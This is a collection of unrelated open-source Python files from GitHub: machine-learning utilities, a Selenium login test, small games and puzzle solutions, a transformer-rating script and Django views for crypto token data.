0\n i = 0\n \n # setup toolbar\n print(\"Progress...\")\n sys.stdout.write(\"|\"+(\"_\" * len(list_methodOne)) + \"_|\\n\")\n sys.stdout.flush()\n sys.stdout.write(\"|>\")\n sys.stdout.flush()\n \n for methodOne in list_methodOne :\n \n # update the bar\n sys.stdout.write(\"\\b\")\n sys.stdout.write(\"=>\")\n sys.stdout.flush()\n \n temp = len(list_key_list_extract[i])*methodOne(rep_dim_feature_per_signal = True)\n rep[:,c:c+temp] = extractFeatureAll(h5file_freq , methodOne , list_param[i] , mat_bool_extract_signal[i] )\n i+=1\n c+=temp\n \n # close the bar\n sys.stdout.write(\"\\b\")\n sys.stdout.write(\"=|\\n\")\n \n if save:\n temp_var_file = open(\"design_matrix/\" +name_save + '.txt','wb')\n pickle.dump(rep , temp_var_file)\n temp_var_file.close()\n \n #Use next 3 lines to read\n # temp_var_file = open(name_save + '.txt','rb')\n # rep = pickle.load(temp_var_file)\n # temp_var_file.close()\n \n #np.savetxt( name_save + '.txt' , rep , delimiter=',', fmt=\"%s\")\n \n return rep\n\n## File handling\n\ndef objectFromFile( file_path ):\n temp_var_file = open(file_path ,'rb')\n rep = pickle.load(temp_var_file)\n temp_var_file.close()\n return 
rep\n\ndef concatenateDesignMatricesFromPath( file_path1 , file_path2 , name_save = None ):\n rep = np.concatenate( (objectFromFile(file_path1), objectFromFile(file_path2)) , axis = 1)\n if not name_save is None:\n temp_var_file = open(\"design_matrix/\" + name_save + '.txt','wb')\n pickle.dump(rep , temp_var_file)\n temp_var_file.close()\n return rep\n\ndef concatenateDesignMatrices( mat1 , mat2 , name_save = None ):\n rep = np.concatenate( (mat1 , mat2) , axis = 1)\n if not name_save is None:\n temp_var_file = open(\"design_matrix/\" + name_save + '.txt','wb')\n pickle.dump(rep , temp_var_file)\n temp_var_file.close()\n return rep\n\n#def labelsCsv2Txt( file_path , name_save ):\n# labels = np.loadtxt(file_path, delimiter=',', skiprows=1, usecols=range(1, 2)).astype('int')\n# temp_var_file = open('data/' + name_save + '.txt','wb')\n# pickle.dump(labels , temp_var_file)\n# temp_var_file.close()\n\n## to do some testing\n# pseudo-h5 file with 3 keys (3 indicators), and 3 samples, of length 29 each\ndico = {}\ndico[\"cle1\"] = [np.arange(1,30) , np.random.normal(10,5,29) , np.arange(2,31) , np.random.uniform(12,45,29) ]\ndico[\"cle2\"] = [np.arange(2,31), np.arange(1,30) , np.random.uniform(12,45,29) , np.random.normal(12,6,29)]\ndico[\"cle3\"] = [np.random.normal(42,1,29), np.random.uniform(12,45,29), np.arange(2,31),np.arange(10,39)]\n\nmat_bool_test = np.array( [ [ 1,1,1 ] , [0,1,1] , [1,0,0] ] )\n \n# print(extractMultiFeatureAll(dico , [nbPikesOne , methodTestOne ] , [ [5,4] , [0] ] , mat_bool_test))\n# print(extractMultiFeatureAll(dico , [nbPikesOne , methodTestOne , stdDeviationNbOne] , [ [5,4] , [0] , [10] ] , mat_bool_test))\n\n## Saving labels as .txt\n#labelsCsv2Txt( 'data/train_y.csv' , 'train_y' )\n","repo_name":"ALEXHERBERTCENTRALE/DREEM_PROJECT","sub_path":"feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":14217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42113675455","text":"import torch #libreria para el aprendizaje automatico\nimport torch.nn as nn\n\n\nclass NeuralNet(nn.Module):\n def __init__(self, tamanio_de_entrada, tamanio_oculto, numero_de_clases):\n super(NeuralNet, self).__init__()\n self.l1 = nn.Linear(tamanio_de_entrada, tamanio_oculto) \n self.l2 = nn.Linear(tamanio_oculto, tamanio_oculto) \n self.l3 = nn.Linear(tamanio_oculto, numero_de_clases)\n self.relu = nn.ReLU()\n \n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n out = self.relu(out)\n out = self.l3(out)\n # sin activación y sin softmax al final\n return out","repo_name":"alexescalante1/CHATBOT-PsicoRobo-v2.0","sub_path":"modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20124049805","text":"'''Some helper functions for PyTorch, including:\n - get_mean_and_std: calculate the mean and std value of dataset.\n - msr_init: net parameter initialization.\n - progress_bar: progress bar mimic xlua.progress.\n'''\nimport os\nimport sys\nimport time\nimport errno\nimport shutil\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torchvision.utils as vutils\nfrom typing import List\nimport numpy as np\nimport matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n__all__ = [\"get_mean_and_std\", \"progress_bar\", \"format_time\",\n 'adjust_learning_rate', 'AverageMeter', 'Logger', 
'mkdir_p']\n\n\ndef merge(x):\n return 2 * x - 1.\n\n\ndef get_mean_and_std(dataset):\n '''Compute the mean and std value of dataset.'''\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True, num_workers=2)\n print('==> Computing mean and std..')\n mean, std = 0, 0\n for inputs, targets in dataloader:\n mean += inputs[:, 0, :, :].mean()\n std += inputs[:, 0, :, :].std()\n mean.div_(len(dataset))\n std.div_(len(dataset))\n return mean, std\n\n\ndef init_params(net):\n '''Init layer parameters.'''\n for m in net.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal(m.weight, mode='fan_out')\n if m.bias:\n init.constant(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant(m.weight, 1)\n init.constant(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal(m.weight, std=1e-3)\n if m.bias:\n init.constant(m.bias, 0)\n\n\n# _, term_width = os.popen('stty size', 'r').read().split()\n# term_width = int(term_width)\n\nTOTAL_BAR_LENGTH = 65.\nlast_time = time.time()\nbegin_time = last_time\n\n\ndef progress_bar(current, total, msg=None):\n global last_time, begin_time\n if current == 0:\n begin_time = time.time() # Reset for new bar.\n\n cur_len = int(TOTAL_BAR_LENGTH * current / total)\n rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1\n\n sys.stdout.write(' [')\n for i in range(cur_len):\n sys.stdout.write('=')\n sys.stdout.write('>')\n for i in range(rest_len):\n sys.stdout.write('.')\n sys.stdout.write(']')\n\n cur_time = time.time()\n step_time = cur_time - last_time\n last_time = cur_time\n tot_time = cur_time - begin_time\n\n L = []\n L.append(' Step: %s' % format_time(step_time))\n L.append(' | Tot: %s' % format_time(tot_time))\n if msg:\n L.append(' | ' + msg)\n\n msg = ''.join(L)\n sys.stdout.write(msg)\n # for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):\n # sys.stdout.write(' ')\n\n # Go back to the center of the bar.\n # for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):\n # sys.stdout.write('\\b')\n sys.stdout.write(' %d/%d ' % (current + 1, total))\n\n if current < total - 1:\n sys.stdout.write('\\r')\n else:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef format_time(seconds):\n days = int(seconds / 3600 / 24)\n seconds = seconds - days * 3600 * 24\n hours = int(seconds / 3600)\n seconds = seconds - hours * 3600\n minutes = int(seconds / 60)\n seconds = seconds - minutes * 60\n secondsf = int(seconds)\n seconds = seconds - secondsf\n millis = int(seconds * 1000)\n\n f = ''\n i = 1\n if days > 0:\n f += str(days) + 'D'\n i += 1\n if hours > 0 and i <= 2:\n f += str(hours) + 'h'\n i += 1\n if minutes > 0 and i <= 2:\n f += str(minutes) + 'm'\n i += 1\n if secondsf > 0 and i <= 2:\n f += str(secondsf) + 's'\n i += 1\n if millis > 0 and i <= 2:\n f += str(millis) + 'ms'\n i += 1\n if f == '':\n f = '0ms'\n return f\n\n\ndef write_record(file_path, str):\n if not os.path.exists(file_path):\n # os.makedirs(file_path)\n os.system(r\"touch {}\".format(file_path))\n f = open(file_path, 'a')\n f.write(str)\n f.close()\n\n\ndef count_parameters(model, all=True):\n # If all= Flase, we only return the trainable parameters; tested\n return sum(p.numel() for p in model.parameters() if p.requires_grad or all)\n\n\ndef adjust_learning_rate(optimizer, epoch, lr, factor=0.1, step=30):\n \"\"\"Sets the learning rate to the initial LR decayed by factor every step epochs\"\"\"\n lr = lr * (factor ** (epoch // step))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\nclass ProgressMeter(object):\n def 
__init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass Logger(object):\n '''Save training process to log file with simple plot function.'''\n\n def __init__(self, fpath, title=None, resume=False):\n self.file = None\n self.resume = resume\n self.title = '' if title == None else title\n if fpath is not None:\n if resume:\n self.file = open(fpath, 'r')\n name = self.file.readline()\n self.names = name.rstrip().split('\\t')\n self.numbers = {}\n for _, name in enumerate(self.names):\n self.numbers[name] = []\n\n for numbers in self.file:\n numbers = numbers.rstrip().split('\\t')\n for i in range(0, len(numbers)):\n self.numbers[self.names[i]].append(numbers[i])\n self.file.close()\n self.file = open(fpath, 'a')\n else:\n self.file = open(fpath, 'w')\n\n def set_names(self, names):\n if self.resume:\n pass\n # initialize numbers as empty list\n self.numbers = {}\n self.names = names\n for _, name in enumerate(self.names):\n self.file.write(name)\n self.file.write('\\t')\n self.numbers[name] = []\n self.file.write('\\n')\n self.file.flush()\n\n def append(self, numbers):\n assert len(self.names) == len(numbers), 'Numbers do not match names'\n for index, num in enumerate(numbers):\n self.file.write(\"{0:.6f}\".format(num))\n self.file.write('\\t')\n self.numbers[self.names[index]].append(num)\n self.file.write('\\n')\n self.file.flush()\n\n def close(self):\n if self.file is not None:\n self.file.close()\n\n\ndef mkdir_p(path):\n '''make dir if not exist'''\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef save_model(net, optimizer, epoch, path, **kwargs):\n state = {\n 'net': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch': epoch\n }\n for key, value in kwargs.items():\n state[key] = value\n torch.save(state, path)\n\n\ndef save_binary_img(tensor, file_path=\"./val.png\", nrow=8):\n # tensor [b,1,w,h]\n predicted = torch.sigmoid(tensor) > 0.5\n vutils.save_image(predicted.float(), file_path, nrow=nrow)\n\n\ndef 
plot_spectrum(spectrums: List[torch.Tensor], labels: List[str], save_path: str = \"./spectrum.png\"):\n assert len(spectrums) >= 1\n assert len(spectrums) == len(labels)\n\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n markers = ['o', 'v', 's', '*', 'p', '+', 'x']\n spectrums = torch.stack(spectrums) # [n, batch, 182, 2]\n print(f\"spectrums shape: {spectrums.shape}\")\n spectrums = spectrums.permute(1, 0, 2, 3)\n batch, n, points, _ = spectrums.shape\n spectrums = spectrums.data.cpu().numpy()\n plt.figure(figsize=(9 * batch, 6))\n for i in range(0, batch):\n i_batch = spectrums[i]\n plt.subplot(1, batch, i + 1)\n for j in range(0, n):\n j_data = i_batch[j] # j in n data / i in batch\n plt.plot(j_data[:, 0], j_data[:, 1], color=colors[j], marker=markers[j], label=labels[j])\n plt.legend()\n plt.title(f\"sample_No_{i + 1}\")\n plt.tight_layout()\n plt.savefig(save_path, bbox_inches='tight', dpi=200)\n plt.close()\n\n # for i in range(0, len(spectrums)):\n # spectrum_batch = spectrums[i].data.cpu().numpy()\n # label = labels[i]\n # for j in range(0, spectrums[0].shape[0]):\n # spectrum = spectrums[i][j].data.cpu().numpy()\n #\n # plt.plot(spectrum[:,0], spectrum[:,1], label=label)\n # plt.legend()\n # plt.savefig(save_path, bbox_inches='tight', dpi=200)\n # plt.close()\n\n\ndef plot_amplitude(spectrum_list: List[torch.Tensor], labels: List[str], save_path: str = \"./spectrum.png\"):\n assert len(spectrum_list) >= 1\n assert len(spectrum_list) == len(labels)\n x_range = np.linspace(600, 1200, 61)\n\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n markers = ['o', 'v', 's', '*', 'p', '+', 'x']\n amplitude_list = []\n for spectrum in spectrum_list:\n amplitude_list.append(spectrum[:, :, 0])\n\n amplitudes = torch.stack(amplitude_list, dim=2) # [batch, 183, n]\n amplitudes = amplitudes.permute(0, 2, 1) # [batch, n, 183]\n batch, n, points = amplitudes.shape\n amplitudes = amplitudes.data.cpu().numpy()\n plt.figure(figsize=(9 * batch, 6*3))\n # plot amplitude\n for nnn in range(3):\n for i in range(0, batch):\n i_batch = amplitudes[i] # [n, 183]\n plt.subplot(3, batch, batch*nnn+i+1)\n for j in range(0, n):\n j_data = i_batch[j] # j in n data / i in batch [183]\n plt.plot(x_range, j_data[61*nnn:61*(nnn+1)], color=colors[j], marker=markers[j], label=labels[j])\n plt.legend()\n plt.title(f\"amplitude{nnn+1} sample_No_{i + 1}\")\n\n\n plt.tight_layout()\n plt.savefig(save_path, bbox_inches='tight', dpi=150)\n plt.close()\n\n\ndef demo():\n a = torch.rand(5, 10, 2)\n b = torch.rand(5, 10, 2)\n plot_spectrum([a, b], [\"a\", \"b\"])\n\n\n# demo()\n","repo_name":"yellowbeango/VAE_NSF","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17574801435","text":"# -- coding: utf-8 --\n\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\n\nclass PythonLogin(unittest.TestCase):\n\n def test_login_chrome(self):\n ser = Service('../chromedriver.exe')\n op = webdriver.ChromeOptions()\n driver = webdriver.Chrome(service=ser, options=op)\n driver.get(\"https://stage.www.vtbconnect.ru/login\")\n self.assertIn(u\"Авторизация\", driver.title)\n elem = driver.find_elements(By.CSS_SELECTOR, '[type=\"text\"][class=\"ant-input ant-input-lg\"]')\n elem[0].send_keys('sp.23@mail.ru')\n 
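# Editorial aside, commented out so it does not change the original test's behavior: bare\n        # find_element calls can race the page render. A hedged sketch using Selenium's explicit\n        # waits (WebDriverWait and expected_conditions are real selenium modules; the 10-second\n        # timeout is an assumption, not from this repo):\n        # from selenium.webdriver.support.ui import WebDriverWait\n        # from selenium.webdriver.support import expected_conditions as EC\n        # elem1 = WebDriverWait(driver, 10).until(\n        #     EC.presence_of_element_located((By.CSS_SELECTOR, '[type=\"password\"]')))\n        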
elem1 = driver.find_element(By.CSS_SELECTOR, '[type=\"password\"][class=\"ant-input ant-input-lg\"]')\n        elem1.send_keys(\"111\")\n        driver.find_element(By.CSS_SELECTOR, '[type=\"submit\"][class*=\"ant-btn Login__form-button\"]').click()\n        self.assertIn(u\"ВТБ Бизнес Коннект\", driver.title)\n        print('login OK')\n        assert \"No results found.\" not in driver.page_source\n        driver.close()\n\nif __name__ == \"__main__\":\n    unittest.main()","repo_name":"Luda-Glazova/Autotests","sub_path":"Old/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"1253011232","text":"from words import words as w\r\n\r\nimport random\r\n\r\nx = random.choice(w)\r\n\r\nres = ''\r\nfor i in range(len(x)):\r\n    res += '-'\r\n\r\nprint(f\"I am thinking of a {len(x)}-letter word. Can you guess it?\", '\\n', res)\r\n\r\nallW = ''\r\ncount = 0\r\n\r\nalpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',\r\n         'w', 'x', 'y', 'z', \"g'\", \"'\"]\r\n\r\nwhile True:\r\n    count += 1\r\n\r\n    top = input(\"Enter a letter: \")\r\n    if top not in alpha:\r\n        print('that is not a letter')\r\n        continue\r\n\r\n    if 1 < len(top):\r\n        print('please enter just 1 character ', end='')\r\n        continue\r\n    if top in allW:\r\n        print(f\"you already entered the letter {top}. Try another \", end='')\r\n        continue\r\n\r\n    allW += top\r\n    for i in range(len(x)):\r\n        if top == x[i]:\r\n            res = res[:i] + top + res[i + 1:]\r\n    print(res)\r\n\r\n    if top in x:\r\n        print(f\"the letter {top} is correct\")\r\n\r\n    if top not in x:\r\n        print(f\"the letter {top} is not in my word\")\r\n\r\n    if res == x:\r\n        print(f\"congratulations, you found the word {x} in {count} tries\")\r\n        print(f\"letters entered so far: {allW}\")\r\n","repo_name":"Saidahmad177/findWord","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"73649570384","text":"#!/usr/bin/env python3\n\nimport os\nimport csv\nfrom datetime import datetime, timedelta\n\ndef gen_hr_tuples(filename):\n    folder = \"heart_rate_files\"\n    full_path = os.path.join(folder, filename)\n    with open(full_path, newline=\"\") as csvfile:\n        reader = csv.reader(csvfile)\n\n        # skip meta data\n        for i in range(14):\n            next(reader)\n\n        # get start time\n        _, starttime_str, *_ = next(reader)\n        starttime = datetime.strptime(starttime_str, \"%Y-%m-%d %H:%M:%S +0000\")\n\n        next(reader) # skip header\n\n        for sec, hr, *_ in reader:\n            dt = starttime + timedelta(seconds=int(sec)-1)\n            yield (dt, int(hr))\n\nif __name__ == \"__main__\":\n    filename = \"2020-5-24-1.csv\"\n    # gen_hr_tuples joins the folder onto the filename itself, so pass the bare name\n    for pair in gen_hr_tuples(filename):\n        print(pair)\n","repo_name":"buzzen/rainbow_trace","sub_path":"hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"26718227184","text":"with open('day4-input', 'r') as file:\n    data = sorted([l.strip('\\n') for l in file])\nimport numpy as np\n\nGUARDs = {}\nGUARD = None\nGUARD_asleep = False\nGUARD_sleeptime = 0\n\ndef parse(line):\n    global GUARD, GUARD_asleep, GUARD_sleeptime\n    date, time, *event = line.split()\n    date = date.lstrip('[')\n    time = time.rstrip(']')\n    minute = int(time.partition(':')[2])\n    if event[0] == 'Guard':\n        if GUARD_asleep and GUARD:\n            
GUARDs[GUARD][GUARD_sleeptime:minute] += 1\n        GUARD = int(event[1].lstrip('#'))\n        if GUARD not in GUARDs:\n            GUARDs[GUARD] = np.zeros((60))\n        GUARD_asleep = False\n    elif event[0] == 'wakes':\n        GUARD_asleep = False\n        if GUARD:\n            GUARDs[GUARD][GUARD_sleeptime:minute] += 1\n    else: # falls asleep\n        GUARD_asleep = True\n        GUARD_sleeptime = minute\n\n\nfor line in data:\n    parse(line)\n\nmax_mins = 0\nmax_g = None\nfor k, v in GUARDs.items():\n    val = v.sum()\n    if val > max_mins:\n        max_mins = val\n        max_g = k\nbiggest_minute = GUARDs[max_g].argmax()\nprint(max_g*biggest_minute) # Part 1\n\n\nmax_mins_2 = 0\nmax_g_2 = None\nfor k, v in GUARDs.items():\n    val = v.max()\n    if val > max_mins_2:\n        max_mins_2 = val\n        max_g_2 = k\nprint(max_g_2*GUARDs[max_g_2].argmax()) # Part 2\n","repo_name":"Birdulon/AdventOfCode","sub_path":"2018/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"13077126893","text":"'''Swapping values between variables'''\r\n\r\n#the usual way is:\r\n\r\nx = 10\r\ny = 'Victor'\r\n\r\nz = x\r\nx = y\r\ny = z\r\n\r\nprint(f'x={x} and y={y}')\r\n\r\n#in python, the value swap looks like this\r\n\r\nx = 10\r\ny = 'Victor'\r\n\r\nx, y = y, x\r\nprint(f'x={x} and y={y}')\r\n\r\n\r\n#swapping with more variables\r\nx = 10\r\ny = 'Victor'\r\nz = 'Pereira'\r\n\r\nx, y, z = z, x, y\r\nprint(f'x={x} and y={y} and z={z}')","repo_name":"victorrrp/Python-Intermediario","sub_path":"aula18_curso.py","file_name":"aula18_curso.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"30596069313","text":"#This program calculates the maximum allowed loading factor given existing load and ambient temp profiles.\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math\r\n\r\nTOR = 65\r\nR = 3.34375\r\nn = 0.8\r\nTAO = 8.659052158\r\nTAOW = 59\r\nHR = 1.98835\r\n\r\nbest = pd.read_csv('best.csv')\r\nbest = best['min'].tolist()\r\n##Amb = best[0:24]\r\n#mid = pd.read_excel('mid.xlsx')\r\n#mid = mid['mid'].tolist()\r\n#worst = pd.read_excel('worst.xlsx')\r\n#worst = worst['max'].tolist()\r\n#actual = pd.read_excel('actual.xlsx')\r\n#actual = actual['actual'].tolist()\r\ntr = pd.read_excel('TRs.xlsx')\r\ntr1 = tr['6.4TR'].tolist()\r\n\r\ndef maxload(Load,Amb):\r\n    a = 0.5\r\n    AgingF = 0\r\n    while AgingF<=1:\r\n        Loada = np.array(Load)*a #scaled load by factor a\r\n        Loada = Loada.tolist()\r\n        Factor = []\r\n        UTOL = []\r\n        UHSL = []\r\n        TOL = []\r\n        HSL = []\r\n        TOi = 0\r\n        Hi = 0\r\n        for i in range (0,24):\r\n            UTO = TOR*((Loada[i]**2*R+1)/(R+1))**n\r\n            UTOL.append(UTO)\r\n            UHS = HR*Loada[i]**(2*n)\r\n            UHSL.append(UHS)\r\n        for i in range (0,20):\r\n            for j in range (0,24):\r\n                TO = (UTOL[j]-TOi)*(1-math.exp(-1/TAO))+TOi\r\n                TOL.append(TO)\r\n                TOi = TOL[-1]\r\n                HS = (UHSL[j]-Hi)*(1-math.exp(-60/TAOW))+Hi\r\n                HSL.append(HS)\r\n                Hi = HSL[-1]\r\n            i= i+1\r\n        TOL = TOL[-24:]\r\n        HSL = HSL[-24:]\r\n        for i in range (0,24):\r\n            HSE = Amb[i]+TOL[i]+HSL[i]\r\n            AF = math.exp((15000/383)-(15000/(HSE+273)))\r\n            Factor.append(AF) \r\n        AgingF = np.mean(Factor)\r\n        a = a+0.02\r\n    maxload = max(Load)*(a-0.04) #revert to original value before exceeding limit\r\n    print(max(Load),a)\r\n    return maxload\r\n\r\nloadmax = []\r\nfor i in range (0,365):\r\n    Amb = best[i*24:i*24+24]\r\n    Load = tr1[i*24:i*24+24]\r\n    mload = max(Load)\r\n    Load = np.array(Load)/mload # normalize the actual loading profile to a 
1.0 p.u. profile\r\n Load = Load.tolist()\r\n lmax = maxload(Load,Amb)\r\n loadmax.append(lmax)\r\n","repo_name":"jsun66/Dynamic-Rating-Forecast-for-Long-term-Power-Transformer-Planning","sub_path":"Rating.py","file_name":"Rating.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7237397823","text":"# Create your views here.\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom scripts.liquidation_threshold import LiquidationThreshold\nfrom services import TokenHistoricalData\nfrom tokens import TokenHistoricalDataSerializer\nfrom tokens.serializers.liquidation_serializer import LiquidationSerializer\nfrom utilities import datetime_utilities\n\n\nclass TokensViewset(GenericViewSet):\n def historical_data(self, request):\n request_body = request.query_params\n self.serializer_class = TokenHistoricalDataSerializer\n serializer = self.serializer_class(data=request_body)\n serializer.is_valid(raise_exception=True)\n validated_data = serializer.validated_data\n result = {\"message\": None, \"data\": None}\n print(validated_data)\n\n token_historical_data = TokenHistoricalData()\n try:\n token_historical_data = token_historical_data.get_historical_data(\n **validated_data\n )\n self._save_df_to_csv(token_historical_data, validated_data[\"token\"])\n result[\"data\"] = token_historical_data\n except Exception as e:\n print(\"Token Historical data API error: {}\".format(str(e)))\n result[\"message\"] = str(e)\n\n return Response(data=result, status=status.HTTP_200_OK)\n\n def liquidation_threshold(self, request):\n \"\"\"\n Returns liquidation threshold based on past 3 months of data. 
Can also gather data from further in the past.\n        Get threshold for each month in the past 3 months, and calculate the mean = acceptable liquidation_threshold\n        \"\"\"\n\n        request_body = request.query_params\n        self.serializer_class = LiquidationSerializer\n        serializer = self.serializer_class(data=request_body)\n        serializer.is_valid(raise_exception=True)\n        validated_data = serializer.validated_data\n\n        result = {\"message\": None, \"data\": {\"thresholds\": []}}\n        timestamps = self.get_past_timestamps()\n\n        lt = LiquidationThreshold()\n        liquidation_threshold = 0\n        try:\n            for timestamp in timestamps:\n                threshold_obj = {}\n                validated_data[\"latest_timestamp\"] = timestamp\n                liquidation_threshold += lt.get_liquidation_threshold(**validated_data)\n                threshold_obj[\"timestamp\"] = timestamp\n                threshold_obj[\"threshold_value\"] = liquidation_threshold\n                result[\"data\"][\"thresholds\"].append(threshold_obj)\n\n            average_liquidation_threshold = liquidation_threshold / len(timestamps)\n            result[\"data\"][\"aggregated_threshold\"] = average_liquidation_threshold\n\n        except Exception as e:\n            print(\"Liquidation Threshold error: {}\".format(str(e)))\n            result[\"message\"] = str(e)\n\n        return Response(data=result, status=status.HTTP_200_OK)\n\n    def get_past_timestamps(self):\n        current_timestamp = datetime.utcnow().timestamp()\n        time_1_month_ago = (datetime.utcnow() - timedelta(days=31)).timestamp()\n        time_2_months_ago = (\n            datetime.fromtimestamp(time_1_month_ago) - timedelta(days=31)\n        ).timestamp()\n        timestamps = [current_timestamp, time_1_month_ago, time_2_months_ago]\n        return timestamps\n\n    def _save_df_to_csv(self, req_data, token):\n        data_from = datetime_utilities.convert_epoch_to_utcdatetime(\n            req_data[\"Data\"][\"TimeFrom\"]\n        )\n        data_to = datetime_utilities.convert_epoch_to_utcdatetime(\n            req_data[\"Data\"][\"TimeTo\"]\n        )\n        req_data[\"Data\"][\"TimeFrom\"] = data_from\n        req_data[\"Data\"][\"TimeTo\"] = data_to\n        max_price = 0\n        for i, obj in enumerate(req_data[\"Data\"][\"Data\"]):\n            req_data[\"Data\"][\"Data\"][i][\n                \"time\"\n            ] = datetime_utilities.convert_epoch_to_utcdatetime(obj[\"time\"])\n            price = req_data[\"Data\"][\"Data\"][i][\"high\"]\n            max_price = max(max_price, price)\n\n        req_data[\"Data\"][\"maxima\"] = max_price\n        df = pd.DataFrame(req_data[\"Data\"])\n        df.to_csv(\n            \"/Users/prithvirajmurthy/Desktop/historical_data_files/{}_data_from:{}_to:{}.csv\".format(\n                token, data_from, data_to\n            )\n        )\n","repo_name":"CruizeFinance/HedgingScripts","sub_path":"tokens/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"38180516160","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Mask R-CNN Demo\n# \n# A quick intro to using the pre-trained model to detect and segment objects.\n\n\n\nimport os\nimport sys\nimport random\nimport math\nimport numpy as np\nimport skimage.io\nfrom skimage.measure import find_contours\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches, lines\nfrom matplotlib.patches import Polygon\nimport time\nimport cv2\nimport glob\nfrom copy import deepcopy\nimport colorsys\nimport json\nimport argparse\nfrom datetime import datetime\nfrom shutil import copyfile\n\n\n\nhome = os.path.expanduser('~')\nmedia_home = home.replace(\"/home\", \"/media\")\n\n# Root directory of the project\nROOT_DIR = os.path.abspath(home + \"/_projects/Cannabis\")\n\n# Import Mask RCNN\n#sys.path.append(ROOT_DIR) # To find 
